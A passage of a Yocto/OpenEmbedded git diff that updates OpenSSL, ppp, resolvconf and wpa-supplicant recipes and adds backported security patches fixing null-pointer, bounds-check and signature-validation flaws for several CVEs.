36@@ -76,6 +76,13 @@ STACK_OF(PKCS12_SAFEBAG) *PKCS12_unpack_
37 PKCS12_R_CONTENT_TYPE_NOT_DATA);
38 return NULL;
39 }
40+
41+ if (p7->d.data == NULL) {
42+ PKCS12err(PKCS12_F_PKCS12_UNPACK_P7DATA,
43+ PKCS12_R_DECODE_ERROR);
44+ return NULL;
45+ }
46+
47 return ASN1_item_unpack(p7->d.data, ASN1_ITEM_rptr(PKCS12_SAFEBAGS));
48 }
49
50@@ -132,6 +139,12 @@ STACK_OF(PKCS12_SAFEBAG) *PKCS12_unpack_
51 {
52 if (!PKCS7_type_is_encrypted(p7))
53 return NULL;
54+
55+ if (p7->d.encrypted == NULL) {
56+ PKCS12err(PKCS12_F_PKCS12_UNPACK_P7DATA, PKCS12_R_DECODE_ERROR);
57+ return NULL;
58+ }
59+
60 return PKCS12_item_decrypt_d2i(p7->d.encrypted->enc_data->algorithm,
61 ASN1_ITEM_rptr(PKCS12_SAFEBAGS),
62 pass, passlen,
63@@ -159,6 +172,13 @@ STACK_OF(PKCS7) *PKCS12_unpack_authsafes
64 PKCS12_R_CONTENT_TYPE_NOT_DATA);
65 return NULL;
66 }
67+
68+ if (p12->authsafes->d.data == NULL) {
69+ PKCS12err(PKCS12_F_PKCS12_UNPACK_AUTHSAFES,
70+ PKCS12_R_DECODE_ERROR);
71+ return NULL;
72+ }
73+
74 return ASN1_item_unpack(p12->authsafes->d.data,
75 ASN1_ITEM_rptr(PKCS12_AUTHSAFES));
76 }
77--- a/crypto/pkcs12/p12_mutl.c
78+++ b/crypto/pkcs12/p12_mutl.c
79@@ -93,6 +93,11 @@ static int pkcs12_gen_mac(PKCS12 *p12, c
80 return 0;
81 }
82
83+ if (p12->authsafes->d.data == NULL) {
84+ PKCS12err(PKCS12_F_PKCS12_GEN_MAC, PKCS12_R_DECODE_ERROR);
85+ return 0;
86+ }
87+
88 salt = p12->mac->salt->data;
89 saltlen = p12->mac->salt->length;
90 if (!p12->mac->iter)
91--- a/crypto/pkcs12/p12_npas.c
92+++ b/crypto/pkcs12/p12_npas.c
93@@ -78,8 +78,9 @@ static int newpass_p12(PKCS12 *p12, cons
94 bags = PKCS12_unpack_p7data(p7);
95 } else if (bagnid == NID_pkcs7_encrypted) {
96 bags = PKCS12_unpack_p7encdata(p7, oldpass, -1);
97- if (!alg_get(p7->d.encrypted->enc_data->algorithm,
98- &pbe_nid, &pbe_iter, &pbe_saltlen))
99+ if (p7->d.encrypted == NULL
100+ || !alg_get(p7->d.encrypted->enc_data->algorithm,
101+ &pbe_nid, &pbe_iter, &pbe_saltlen))
102 goto err;
103 } else {
104 continue;
105--- a/crypto/pkcs7/pk7_mime.c
106+++ b/crypto/pkcs7/pk7_mime.c
107@@ -30,10 +30,13 @@ int SMIME_write_PKCS7(BIO *bio, PKCS7 *p
108 {
109 STACK_OF(X509_ALGOR) *mdalgs;
110 int ctype_nid = OBJ_obj2nid(p7->type);
111- if (ctype_nid == NID_pkcs7_signed)
112+ if (ctype_nid == NID_pkcs7_signed) {
113+ if (p7->d.sign == NULL)
114+ return 0;
115 mdalgs = p7->d.sign->md_algs;
116- else
117+ } else {
118 mdalgs = NULL;
119+ }
120
121 flags ^= SMIME_OLDMIME;
122
diff --git a/meta/recipes-connectivity/openssl/openssl/reproducibility.patch b/meta/recipes-connectivity/openssl/openssl/reproducibility.patch
new file mode 100644
index 0000000000..8accbc9df2
--- /dev/null
+++ b/meta/recipes-connectivity/openssl/openssl/reproducibility.patch
@@ -0,0 +1,22 @@
1Using localtime() means the output can depend on the timezone of the build machine.
2Using gmtime() is safer. For complete reproducibility use SOURCE_DATE_EPOCH if set.
3
4Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
5Upstream-Status: Pending [should be suitable]
6
7Index: openssl-3.0.1/apps/progs.pl
8===================================================================
9--- openssl-3.0.1.orig/apps/progs.pl
10+++ openssl-3.0.1/apps/progs.pl
11@@ -21,7 +21,10 @@ die "Unrecognised option, must be -C or
12 my %commands = ();
13 my $cmdre = qr/^\s*int\s+([a-z_][a-z0-9_]*)_main\(\s*int\s+argc\s*,/;
14 my $apps_openssl = shift @ARGV;
15-my $YEAR = [localtime()]->[5] + 1900;
16+my $YEAR = [gmtime()]->[5] + 1900;
17+if (defined($ENV{SOURCE_DATE_EPOCH}) && $ENV{SOURCE_DATE_EPOCH} !~ /\D/) {
18+ $YEAR = [gmtime($ENV{SOURCE_DATE_EPOCH})]->[5] + 1900;
19+}
20
21 # because the program apps/openssl has object files as sources, and
22 # they then have the corresponding C files as source, we need to chain
diff --git a/meta/recipes-connectivity/openssl/openssl_1.1.1i.bb b/meta/recipes-connectivity/openssl/openssl_1.1.1w.bb
index 5d22c511aa..0e490eabc3 100644
--- a/meta/recipes-connectivity/openssl/openssl_1.1.1i.bb
+++ b/meta/recipes-connectivity/openssl/openssl_1.1.1w.bb
@@ -17,13 +17,17 @@ SRC_URI = "http://www.openssl.org/source/openssl-${PV}.tar.gz \
17 file://0001-buildinfo-strip-sysroot-and-debug-prefix-map-from-co.patch \ 17 file://0001-buildinfo-strip-sysroot-and-debug-prefix-map-from-co.patch \
18 file://afalg.patch \ 18 file://afalg.patch \
19 file://reproducible.patch \ 19 file://reproducible.patch \
20 file://reproducibility.patch \
21 file://0001-Configure-add-2-missing-key-sorts.patch \
22 file://0001-Configure-do-not-tweak-mips-cflags.patch \
23 file://CVE-2024-0727.patch \
20 " 24 "
21 25
22SRC_URI_append_class-nativesdk = " \ 26SRC_URI_append_class-nativesdk = " \
23 file://environment.d-openssl.sh \ 27 file://environment.d-openssl.sh \
24 " 28 "
25 29
26SRC_URI[sha256sum] = "e8be6a35fe41d10603c3cc635e93289ed00bf34b79671a3a4de64fcee00d5242" 30SRC_URI[sha256sum] = "cf3098950cb4d853ad95c0841f1f9c6d3dc102dccfcacd521d93925208b76ac8"
27 31
28inherit lib_package multilib_header multilib_script ptest 32inherit lib_package multilib_header multilib_script ptest
29MULTILIB_SCRIPTS = "${PN}-bin:${bindir}/c_rehash" 33MULTILIB_SCRIPTS = "${PN}-bin:${bindir}/c_rehash"
@@ -179,6 +183,7 @@ do_install_ptest () {
179 install -m755 ${B}/apps/CA.pl ${D}${PTEST_PATH}/apps 183 install -m755 ${B}/apps/CA.pl ${D}${PTEST_PATH}/apps
180 184
181 install -d ${D}${PTEST_PATH}/engines 185 install -d ${D}${PTEST_PATH}/engines
186 install -m755 ${B}/engines/dasync.so ${D}${PTEST_PATH}/engines
182 install -m755 ${B}/engines/ossltest.so ${D}${PTEST_PATH}/engines 187 install -m755 ${B}/engines/ossltest.so ${D}${PTEST_PATH}/engines
183} 188}
184 189
diff --git a/meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb b/meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb
index b5f68951d7..b0097aa480 100644
--- a/meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb
+++ b/meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Enables PPP dial-in through a serial connection" 1SUMMARY = "Enables PPP dial-in through a serial connection"
2SECTION = "console/network" 2SECTION = "console/network"
3DESCRIPTION = "PPP dail-in provides a point to point protocol (PPP), so that other computers can dial up to it and access connected networks."
3DEPENDS = "ppp" 4DEPENDS = "ppp"
4RDEPENDS_${PN} = "ppp" 5RDEPENDS_${PN} = "ppp"
5PR = "r8" 6PR = "r8"
diff --git a/meta/recipes-connectivity/ppp/ppp/CVE-2022-4603.patch b/meta/recipes-connectivity/ppp/ppp/CVE-2022-4603.patch
new file mode 100644
index 0000000000..27b8863a4e
--- /dev/null
+++ b/meta/recipes-connectivity/ppp/ppp/CVE-2022-4603.patch
@@ -0,0 +1,50 @@
1From 2aeb41a9a3a43b11b1e46628d0bf98197ff9f141 Mon Sep 17 00:00:00 2001
2From: Paul Mackerras <paulus@ozlabs.org>
3Date: Thu, 29 Dec 2022 18:00:20 +0100
4Subject: [PATCH] pppdump: Avoid out-of-range access to packet buffer
5
6This fixes a potential vulnerability where data is written to spkt.buf
7and rpkt.buf without a check on the array index. To fix this, we
8check the array index (pkt->cnt) before storing the byte or
9incrementing the count. This also means we no longer have a potential
10signed integer overflow on the increment of pkt->cnt.
11
12Fortunately, pppdump is not used in the normal process of setting up a
13PPP connection, is not installed setuid-root, and is not invoked
14automatically in any scenario that I am aware of.
15
16Ustream-Status: Backport [https://github.com/ppp-project/ppp/commit/a75fb7b198eed50d769c80c36629f38346882cbf]
17CVE: CVE-2022-4603
18Signed-off-by:Minjae Kim <flowergom@gmail.com>
19---
20 pppdump/pppdump.c | 7 ++++++-
21 1 file changed, 6 insertions(+), 1 deletion(-)
22
23diff --git a/pppdump/pppdump.c b/pppdump/pppdump.c
24index 87c2e8f..dec4def 100644
25--- a/pppdump/pppdump.c
26+++ b/pppdump/pppdump.c
27@@ -296,6 +296,10 @@ dumpppp(f)
28 printf("%s aborted packet:\n ", dir);
29 q = " ";
30 }
31+ if (pkt->cnt >= sizeof(pkt->buf)) {
32+ printf("%s over-long packet truncated:\n ", dir);
33+ q = " ";
34+ }
35 nb = pkt->cnt;
36 p = pkt->buf;
37 pkt->cnt = 0;
38@@ -399,7 +403,8 @@ dumpppp(f)
39 c ^= 0x20;
40 pkt->esc = 0;
41 }
42- pkt->buf[pkt->cnt++] = c;
43+ if (pkt->cnt < sizeof(pkt->buf))
44+ pkt->buf[pkt->cnt++] = c;
45 break;
46 }
47 }
48--
492.25.1
50
diff --git a/meta/recipes-connectivity/ppp/ppp_2.4.7.bb b/meta/recipes-connectivity/ppp/ppp_2.4.7.bb
index 76c1cc62a7..51ec25e660 100644
--- a/meta/recipes-connectivity/ppp/ppp_2.4.7.bb
+++ b/meta/recipes-connectivity/ppp/ppp_2.4.7.bb
@@ -34,6 +34,7 @@ SRC_URI = "https://download.samba.org/pub/${BPN}/${BP}.tar.gz \
34 file://0001-ppp-Remove-unneeded-include.patch \ 34 file://0001-ppp-Remove-unneeded-include.patch \
35 file://ppp-2.4.7-DES-openssl.patch \ 35 file://ppp-2.4.7-DES-openssl.patch \
36 file://0001-pppd-Fix-bounds-check-in-EAP-code.patch \ 36 file://0001-pppd-Fix-bounds-check-in-EAP-code.patch \
37 file://CVE-2022-4603.patch \
37" 38"
38 39
39SRC_URI_append_libc-musl = "\ 40SRC_URI_append_libc-musl = "\
diff --git a/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb b/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb
index 67959576e8..5f0a5eac70 100644
--- a/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb
+++ b/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb
@@ -11,7 +11,7 @@ AUTHOR = "Thomas Hood"
11HOMEPAGE = "http://packages.debian.org/resolvconf" 11HOMEPAGE = "http://packages.debian.org/resolvconf"
12RDEPENDS_${PN} = "bash" 12RDEPENDS_${PN} = "bash"
13 13
14SRC_URI = "git://salsa.debian.org/debian/resolvconf.git;protocol=https \ 14SRC_URI = "git://salsa.debian.org/debian/resolvconf.git;protocol=https;branch=unstable \
15 file://fix-path-for-busybox.patch \ 15 file://fix-path-for-busybox.patch \
16 file://99_resolvconf \ 16 file://99_resolvconf \
17 " 17 "
diff --git a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-0326.patch b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-0326.patch
new file mode 100644
index 0000000000..8c90fa3421
--- /dev/null
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-0326.patch
@@ -0,0 +1,45 @@
1From 947272febe24a8f0ea828b5b2f35f13c3821901e Mon Sep 17 00:00:00 2001
2From: Jouni Malinen <jouni@codeaurora.org>
3Date: Mon, 9 Nov 2020 11:43:12 +0200
4Subject: [PATCH] P2P: Fix copying of secondary device types for P2P group
5 client
6
7Parsing and copying of WPS secondary device types list was verifying
8that the contents is not too long for the internal maximum in the case
9of WPS messages, but similar validation was missing from the case of P2P
10group information which encodes this information in a different
11attribute. This could result in writing beyond the memory area assigned
12for these entries and corrupting memory within an instance of struct
13p2p_device. This could result in invalid operations and unexpected
14behavior when trying to free pointers from that corrupted memory.
15
16Upstream-Status: Backport
17CVE: CVE-2021-0326
18
19Reference to upstream patch:
20[https://w1.fi/cgit/hostap/commit/?id=947272febe24a8f0ea828b5b2f35f13c3821901e]
21
22Credit to OSS-Fuzz: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=27269
23Fixes: e57ae6e19edf ("P2P: Keep track of secondary device types for peers")
24Signed-off-by: Jouni Malinen <jouni@codeaurora.org>
25Signed-off-by: Stefan Ghinea <stefan.ghinea@windriver.com>
26---
27 src/p2p/p2p.c | 2 ++
28 1 file changed, 2 insertions(+)
29
30diff --git a/src/p2p/p2p.c b/src/p2p/p2p.c
31index a08ba02..079270f 100644
32--- a/src/p2p/p2p.c
33+++ b/src/p2p/p2p.c
34@@ -453,6 +453,8 @@ static void p2p_copy_client_info(struct p2p_device *dev,
35 dev->info.config_methods = cli->config_methods;
36 os_memcpy(dev->info.pri_dev_type, cli->pri_dev_type, 8);
37 dev->info.wps_sec_dev_type_list_len = 8 * cli->num_sec_dev_types;
38+ if (dev->info.wps_sec_dev_type_list_len > WPS_SEC_DEV_TYPE_MAX_LEN)
39+ dev->info.wps_sec_dev_type_list_len = WPS_SEC_DEV_TYPE_MAX_LEN;
40 os_memcpy(dev->info.wps_sec_dev_type_list, cli->sec_dev_types,
41 dev->info.wps_sec_dev_type_list_len);
42 }
43--
442.17.1
45
diff --git a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-27803.patch b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-27803.patch
new file mode 100644
index 0000000000..004b1dbd19
--- /dev/null
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-27803.patch
@@ -0,0 +1,58 @@
1From 8460e3230988ef2ec13ce6b69b687e941f6cdb32 Mon Sep 17 00:00:00 2001
2From: Jouni Malinen <jouni@codeaurora.org>
3Date: Tue, 8 Dec 2020 23:52:50 +0200
4Subject: [PATCH] P2P: Fix a corner case in peer addition based on PD Request
5
6p2p_add_device() may remove the oldest entry if there is no room in the
7peer table for a new peer. This would result in any pointer to that
8removed entry becoming stale. A corner case with an invalid PD Request
9frame could result in such a case ending up using (read+write) freed
10memory. This could only by triggered when the peer table has reached its
11maximum size and the PD Request frame is received from the P2P Device
12Address of the oldest remaining entry and the frame has incorrect P2P
13Device Address in the payload.
14
15Fix this by fetching the dev pointer again after having called
16p2p_add_device() so that the stale pointer cannot be used.
17
18Fixes: 17bef1e97a50 ("P2P: Add peer entry based on Provision Discovery Request")
19Signed-off-by: Jouni Malinen <jouni@codeaurora.org>
20
21Upstream-Status: Backport
22CVE: CVE-2021-27803
23
24Reference to upstream patch:
25[https://w1.fi/cgit/hostap/commit/?id=8460e3230988ef2ec13ce6b69b687e941f6cdb32]
26
27Signed-off-by: Stefan Ghinea <stefan.ghinea@windriver.com>
28---
29 src/p2p/p2p_pd.c | 12 +++++-------
30 1 file changed, 5 insertions(+), 7 deletions(-)
31
32diff --git a/src/p2p/p2p_pd.c b/src/p2p/p2p_pd.c
33index 3994ec0..05fd593 100644
34--- a/src/p2p/p2p_pd.c
35+++ b/src/p2p/p2p_pd.c
36@@ -595,14 +595,12 @@ void p2p_process_prov_disc_req(struct p2p_data *p2p, const u8 *sa,
37 goto out;
38 }
39
40+ dev = p2p_get_device(p2p, sa);
41 if (!dev) {
42- dev = p2p_get_device(p2p, sa);
43- if (!dev) {
44- p2p_dbg(p2p,
45- "Provision Discovery device not found "
46- MACSTR, MAC2STR(sa));
47- goto out;
48- }
49+ p2p_dbg(p2p,
50+ "Provision Discovery device not found "
51+ MACSTR, MAC2STR(sa));
52+ goto out;
53 }
54 } else if (msg.wfd_subelems) {
55 wpabuf_free(dev->info.wfd_subelems);
56--
572.17.1
58
diff --git a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-30004.patch b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-30004.patch
new file mode 100644
index 0000000000..e2540fc26b
--- /dev/null
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-30004.patch
@@ -0,0 +1,123 @@
1From a0541334a6394f8237a4393b7372693cd7e96f15 Mon Sep 17 00:00:00 2001
2From: Jouni Malinen <j@w1.fi>
3Date: Sat, 13 Mar 2021 18:19:31 +0200
4Subject: [PATCH] ASN.1: Validate DigestAlgorithmIdentifier parameters
5
6The supported hash algorithms do not use AlgorithmIdentifier parameters.
7However, there are implementations that include NULL parameters in
8addition to ones that omit the parameters. Previous implementation did
9not check the parameters value at all which supported both these cases,
10but did not reject any other unexpected information.
11
12Use strict validation of digest algorithm parameters and reject any
13unexpected value when validating a signature. This is needed to prevent
14potential forging attacks.
15
16Signed-off-by: Jouni Malinen <j@w1.fi>
17
18Upstream-Status: Backport
19CVE: CVE-2021-30004
20
21Reference to upstream patch:
22[https://w1.fi/cgit/hostap/commit/?id=a0541334a6394f8237a4393b7372693cd7e96f15]
23
24Signed-off-by: Stefan Ghinea <stefan.ghinea@windriver.com>
25---
26 src/tls/pkcs1.c | 21 +++++++++++++++++++++
27 src/tls/x509v3.c | 20 ++++++++++++++++++++
28 2 files changed, 41 insertions(+)
29
30diff --git a/src/tls/pkcs1.c b/src/tls/pkcs1.c
31index 141ac50..e09db07 100644
32--- a/src/tls/pkcs1.c
33+++ b/src/tls/pkcs1.c
34@@ -240,6 +240,8 @@ int pkcs1_v15_sig_ver(struct crypto_public_key *pk,
35 os_free(decrypted);
36 return -1;
37 }
38+ wpa_hexdump(MSG_MSGDUMP, "PKCS #1: DigestInfo",
39+ hdr.payload, hdr.length);
40
41 pos = hdr.payload;
42 end = pos + hdr.length;
43@@ -261,6 +263,8 @@ int pkcs1_v15_sig_ver(struct crypto_public_key *pk,
44 os_free(decrypted);
45 return -1;
46 }
47+ wpa_hexdump(MSG_MSGDUMP, "PKCS #1: DigestAlgorithmIdentifier",
48+ hdr.payload, hdr.length);
49 da_end = hdr.payload + hdr.length;
50
51 if (asn1_get_oid(hdr.payload, hdr.length, &oid, &next)) {
52@@ -269,6 +273,23 @@ int pkcs1_v15_sig_ver(struct crypto_public_key *pk,
53 os_free(decrypted);
54 return -1;
55 }
56+ wpa_hexdump(MSG_MSGDUMP, "PKCS #1: Digest algorithm parameters",
57+ next, da_end - next);
58+
59+ /*
60+ * RFC 5754: The correct encoding for the SHA2 algorithms would be to
61+ * omit the parameters, but there are implementation that encode these
62+ * as a NULL element. Allow these two cases and reject anything else.
63+ */
64+ if (da_end > next &&
65+ (asn1_get_next(next, da_end - next, &hdr) < 0 ||
66+ !asn1_is_null(&hdr) ||
67+ hdr.payload + hdr.length != da_end)) {
68+ wpa_printf(MSG_DEBUG,
69+ "PKCS #1: Unexpected digest algorithm parameters");
70+ os_free(decrypted);
71+ return -1;
72+ }
73
74 if (!asn1_oid_equal(&oid, hash_alg)) {
75 char txt[100], txt2[100];
76diff --git a/src/tls/x509v3.c b/src/tls/x509v3.c
77index 1bd5aa0..bf2289f 100644
78--- a/src/tls/x509v3.c
79+++ b/src/tls/x509v3.c
80@@ -1834,6 +1834,7 @@ int x509_check_signature(struct x509_certificate *issuer,
81 os_free(data);
82 return -1;
83 }
84+ wpa_hexdump(MSG_MSGDUMP, "X509: DigestInfo", hdr.payload, hdr.length);
85
86 pos = hdr.payload;
87 end = pos + hdr.length;
88@@ -1855,6 +1856,8 @@ int x509_check_signature(struct x509_certificate *issuer,
89 os_free(data);
90 return -1;
91 }
92+ wpa_hexdump(MSG_MSGDUMP, "X509: DigestAlgorithmIdentifier",
93+ hdr.payload, hdr.length);
94 da_end = hdr.payload + hdr.length;
95
96 if (asn1_get_oid(hdr.payload, hdr.length, &oid, &next)) {
97@@ -1862,6 +1865,23 @@ int x509_check_signature(struct x509_certificate *issuer,
98 os_free(data);
99 return -1;
100 }
101+ wpa_hexdump(MSG_MSGDUMP, "X509: Digest algorithm parameters",
102+ next, da_end - next);
103+
104+ /*
105+ * RFC 5754: The correct encoding for the SHA2 algorithms would be to
106+ * omit the parameters, but there are implementation that encode these
107+ * as a NULL element. Allow these two cases and reject anything else.
108+ */
109+ if (da_end > next &&
110+ (asn1_get_next(next, da_end - next, &hdr) < 0 ||
111+ !asn1_is_null(&hdr) ||
112+ hdr.payload + hdr.length != da_end)) {
113+ wpa_printf(MSG_DEBUG,
114+ "X509: Unexpected digest algorithm parameters");
115+ os_free(data);
116+ return -1;
117+ }
118
119 if (x509_sha1_oid(&oid)) {
120 if (signature->oid.oid[6] != 5 /* sha-1WithRSAEncryption */) {
121--
1222.17.1
123
diff --git a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2022-23303-4.patch b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2022-23303-4.patch
new file mode 100644
index 0000000000..21e65ba961
--- /dev/null
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2022-23303-4.patch
@@ -0,0 +1,609 @@
1From 208e5687ff2e48622e28d8888ce5444a54353bbd Mon Sep 17 00:00:00 2001
2From: Jouni Malinen <jouni@codeaurora.org>
3Date: Tue, 27 Aug 2019 16:33:15 +0300
4Subject: [PATCH 1/4] crypto: Add more bignum/EC helper functions
5
6These are needed for implementing SAE hash-to-element.
7
8Signed-off-by: Jouni Malinen <jouni@codeaurora.org>
9
10Upstream-Status: Backport
11https://w1.fi/security/2022-1/
12
13CVE: CVE-2022-23303 CVE-2022-23304
14Signed-off-by: Steve Sakoman <steve@sakoman.com>
15
16---
17 src/crypto/crypto.h | 45 ++++++++++++++++++
18 src/crypto/crypto_openssl.c | 94 +++++++++++++++++++++++++++++++++++++
19 src/crypto/crypto_wolfssl.c | 66 ++++++++++++++++++++++++++
20 3 files changed, 205 insertions(+)
21
22diff --git a/src/crypto/crypto.h b/src/crypto/crypto.h
23index 15f8ad04cea4..68476dbce96c 100644
24--- a/src/crypto/crypto.h
25+++ b/src/crypto/crypto.h
26@@ -518,6 +518,13 @@ struct crypto_bignum * crypto_bignum_init(void);
27 */
28 struct crypto_bignum * crypto_bignum_init_set(const u8 *buf, size_t len);
29
30+/**
31+ * crypto_bignum_init_set - Allocate memory for bignum and set the value (uint)
32+ * @val: Value to set
33+ * Returns: Pointer to allocated bignum or %NULL on failure
34+ */
35+struct crypto_bignum * crypto_bignum_init_uint(unsigned int val);
36+
37 /**
38 * crypto_bignum_deinit - Free bignum
39 * @n: Bignum from crypto_bignum_init() or crypto_bignum_init_set()
40@@ -612,6 +619,19 @@ int crypto_bignum_div(const struct crypto_bignum *a,
41 const struct crypto_bignum *b,
42 struct crypto_bignum *c);
43
44+/**
45+ * crypto_bignum_addmod - d = a + b (mod c)
46+ * @a: Bignum
47+ * @b: Bignum
48+ * @c: Bignum
49+ * @d: Bignum; used to store the result of (a + b) % c
50+ * Returns: 0 on success, -1 on failure
51+ */
52+int crypto_bignum_addmod(const struct crypto_bignum *a,
53+ const struct crypto_bignum *b,
54+ const struct crypto_bignum *c,
55+ struct crypto_bignum *d);
56+
57 /**
58 * crypto_bignum_mulmod - d = a * b (mod c)
59 * @a: Bignum
60@@ -625,6 +645,28 @@ int crypto_bignum_mulmod(const struct crypto_bignum *a,
61 const struct crypto_bignum *c,
62 struct crypto_bignum *d);
63
64+/**
65+ * crypto_bignum_sqrmod - c = a^2 (mod b)
66+ * @a: Bignum
67+ * @b: Bignum
68+ * @c: Bignum; used to store the result of a^2 % b
69+ * Returns: 0 on success, -1 on failure
70+ */
71+int crypto_bignum_sqrmod(const struct crypto_bignum *a,
72+ const struct crypto_bignum *b,
73+ struct crypto_bignum *c);
74+
75+/**
76+ * crypto_bignum_sqrtmod - returns sqrt(a) (mod b)
77+ * @a: Bignum
78+ * @b: Bignum
79+ * @c: Bignum; used to store the result
80+ * Returns: 0 on success, -1 on failure
81+ */
82+int crypto_bignum_sqrtmod(const struct crypto_bignum *a,
83+ const struct crypto_bignum *b,
84+ struct crypto_bignum *c);
85+
86 /**
87 * crypto_bignum_rshift - r = a >> n
88 * @a: Bignum
89@@ -731,6 +773,9 @@ const struct crypto_bignum * crypto_ec_get_prime(struct crypto_ec *e);
90 */
91 const struct crypto_bignum * crypto_ec_get_order(struct crypto_ec *e);
92
93+const struct crypto_bignum * crypto_ec_get_a(struct crypto_ec *e);
94+const struct crypto_bignum * crypto_ec_get_b(struct crypto_ec *e);
95+
96 /**
97 * struct crypto_ec_point - Elliptic curve point
98 *
99diff --git a/src/crypto/crypto_openssl.c b/src/crypto/crypto_openssl.c
100index bab33a537293..ed463105e8f1 100644
101--- a/src/crypto/crypto_openssl.c
102+++ b/src/crypto/crypto_openssl.c
103@@ -1283,6 +1283,24 @@ struct crypto_bignum * crypto_bignum_init_set(const u8 *buf, size_t len)
104 }
105
106
107+struct crypto_bignum * crypto_bignum_init_uint(unsigned int val)
108+{
109+ BIGNUM *bn;
110+
111+ if (TEST_FAIL())
112+ return NULL;
113+
114+ bn = BN_new();
115+ if (!bn)
116+ return NULL;
117+ if (BN_set_word(bn, val) != 1) {
118+ BN_free(bn);
119+ return NULL;
120+ }
121+ return (struct crypto_bignum *) bn;
122+}
123+
124+
125 void crypto_bignum_deinit(struct crypto_bignum *n, int clear)
126 {
127 if (clear)
128@@ -1449,6 +1467,28 @@ int crypto_bignum_div(const struct crypto_bignum *a,
129 }
130
131
132+int crypto_bignum_addmod(const struct crypto_bignum *a,
133+ const struct crypto_bignum *b,
134+ const struct crypto_bignum *c,
135+ struct crypto_bignum *d)
136+{
137+ int res;
138+ BN_CTX *bnctx;
139+
140+ if (TEST_FAIL())
141+ return -1;
142+
143+ bnctx = BN_CTX_new();
144+ if (!bnctx)
145+ return -1;
146+ res = BN_mod_add((BIGNUM *) d, (const BIGNUM *) a, (const BIGNUM *) b,
147+ (const BIGNUM *) c, bnctx);
148+ BN_CTX_free(bnctx);
149+
150+ return res ? 0 : -1;
151+}
152+
153+
154 int crypto_bignum_mulmod(const struct crypto_bignum *a,
155 const struct crypto_bignum *b,
156 const struct crypto_bignum *c,
157@@ -1472,6 +1512,48 @@ int crypto_bignum_mulmod(const struct crypto_bignum *a,
158 }
159
160
161+int crypto_bignum_sqrmod(const struct crypto_bignum *a,
162+ const struct crypto_bignum *b,
163+ struct crypto_bignum *c)
164+{
165+ int res;
166+ BN_CTX *bnctx;
167+
168+ if (TEST_FAIL())
169+ return -1;
170+
171+ bnctx = BN_CTX_new();
172+ if (!bnctx)
173+ return -1;
174+ res = BN_mod_sqr((BIGNUM *) c, (const BIGNUM *) a, (const BIGNUM *) b,
175+ bnctx);
176+ BN_CTX_free(bnctx);
177+
178+ return res ? 0 : -1;
179+}
180+
181+
182+int crypto_bignum_sqrtmod(const struct crypto_bignum *a,
183+ const struct crypto_bignum *b,
184+ struct crypto_bignum *c)
185+{
186+ BN_CTX *bnctx;
187+ BIGNUM *res;
188+
189+ if (TEST_FAIL())
190+ return -1;
191+
192+ bnctx = BN_CTX_new();
193+ if (!bnctx)
194+ return -1;
195+ res = BN_mod_sqrt((BIGNUM *) c, (const BIGNUM *) a, (const BIGNUM *) b,
196+ bnctx);
197+ BN_CTX_free(bnctx);
198+
199+ return res ? 0 : -1;
200+}
201+
202+
203 int crypto_bignum_rshift(const struct crypto_bignum *a, int n,
204 struct crypto_bignum *r)
205 {
206@@ -1682,6 +1764,18 @@ const struct crypto_bignum * crypto_ec_get_order(struct crypto_ec *e)
207 }
208
209
210+const struct crypto_bignum * crypto_ec_get_a(struct crypto_ec *e)
211+{
212+ return (const struct crypto_bignum *) e->a;
213+}
214+
215+
216+const struct crypto_bignum * crypto_ec_get_b(struct crypto_ec *e)
217+{
218+ return (const struct crypto_bignum *) e->b;
219+}
220+
221+
222 void crypto_ec_point_deinit(struct crypto_ec_point *p, int clear)
223 {
224 if (clear)
225diff --git a/src/crypto/crypto_wolfssl.c b/src/crypto/crypto_wolfssl.c
226index 4cedab4367cd..e9894b335e53 100644
227--- a/src/crypto/crypto_wolfssl.c
228+++ b/src/crypto/crypto_wolfssl.c
229@@ -1042,6 +1042,26 @@ struct crypto_bignum * crypto_bignum_init_set(const u8 *buf, size_t len)
230 }
231
232
233+struct crypto_bignum * crypto_bignum_init_uint(unsigned int val)
234+{
235+ mp_int *a;
236+
237+ if (TEST_FAIL())
238+ return NULL;
239+
240+ a = (mp_int *) crypto_bignum_init();
241+ if (!a)
242+ return NULL;
243+
244+ if (mp_set_int(a, val) != MP_OKAY) {
245+ os_free(a);
246+ a = NULL;
247+ }
248+
249+ return (struct crypto_bignum *) a;
250+}
251+
252+
253 void crypto_bignum_deinit(struct crypto_bignum *n, int clear)
254 {
255 if (!n)
256@@ -1168,6 +1188,19 @@ int crypto_bignum_div(const struct crypto_bignum *a,
257 }
258
259
260+int crypto_bignum_addmod(const struct crypto_bignum *a,
261+ const struct crypto_bignum *b,
262+ const struct crypto_bignum *c,
263+ struct crypto_bignum *d)
264+{
265+ if (TEST_FAIL())
266+ return -1;
267+
268+ return mp_addmod((mp_int *) a, (mp_int *) b, (mp_int *) c,
269+ (mp_int *) d) == MP_OKAY ? 0 : -1;
270+}
271+
272+
273 int crypto_bignum_mulmod(const struct crypto_bignum *a,
274 const struct crypto_bignum *b,
275 const struct crypto_bignum *m,
276@@ -1181,6 +1214,27 @@ int crypto_bignum_mulmod(const struct crypto_bignum *a,
277 }
278
279
280+int crypto_bignum_sqrmod(const struct crypto_bignum *a,
